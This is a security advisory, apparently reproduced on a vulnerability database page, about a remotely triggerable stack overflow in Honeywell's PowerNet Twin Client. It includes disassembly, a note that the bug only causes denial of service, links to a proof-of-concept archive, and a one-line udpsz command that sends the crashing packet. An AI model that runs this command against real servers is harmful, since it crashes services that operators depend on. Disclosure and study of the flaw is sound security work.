Vulners
Lucene search
PowerNet Twin Client <= 8.9 (RFSync 1.0.0.1) Crash PoC
#######################################################################
Luigi Auriemma
Application: PowerNet Twin Client
http://www.honeywellaidc.com/en-US/Pages/Product.aspx?category=Software&cat=HSM&pid=PowerNet%20Twin%20Client
Versions: <= 8.9 (RFSync 1.0.0.1)
Platforms: Windows
Bug: unexploitable stack overflow
Exploitation: remote
Date: 29 Jun 2012
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"PowerNet Twin Client v8.9 PowerNet Twin Client is a serverless,
terminal based software used in 2.4 GHz networks."
#######################################################################
======
2) Bug
======
The software uses the function 00403cb0 to read 100 bytes from the
incoming connection and uses a signed 8bit value provided by the
client to copy this data in a stack buffer:
00403DCB |. 0FBE4424 29 MOVSX EAX,BYTE PTR SS:[ESP+29] ; 8bit size with 8->32bit
00403DD0 |. 8B8C24 38020000 MOV ECX,DWORD PTR SS:[ESP+238] ; integer expansion bug
00403DD7 |. 83C4 08 ADD ESP,8
00403DDA |. 48 DEC EAX ; integer overflow
00403DDB |. 85C9 TEST ECX,ECX
00403DDD |. 74 02 JE SHORT RFSync.00403DE1
00403DDF |. 8901 MOV DWORD PTR DS:[ECX],EAX
00403DE1 |> 8B9424 2C020000 MOV EDX,DWORD PTR SS:[ESP+22C]
00403DE8 |. 85D2 TEST EDX,EDX
00403DEA |. 74 29 JE SHORT RFSync.00403E15
00403DEC |. 8BC8 MOV ECX,EAX
00403DEE |. 8BD9 MOV EBX,ECX
00403DF0 |. C1E9 02 SHR ECX,2
00403DF3 |. 8BFA MOV EDI,EDX
00403DF5 |. 8D7424 23 LEA ESI,DWORD PTR SS:[ESP+23] ; stack overflow
00403DF9 |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
So the byte 0x80 will become 0xffffff80 and so on.
Unfortunately this vulnerabily cannot be exploited to execute code
because there is no way to control the data located after the packet
that has a fixed size of 100 bytes: the result is just a Denial of
Service.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
http://www.exploit-db.com/sploits/19456.zip
udpsz -T -b 0x41 -C "11 00" SERVER 1804 100
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1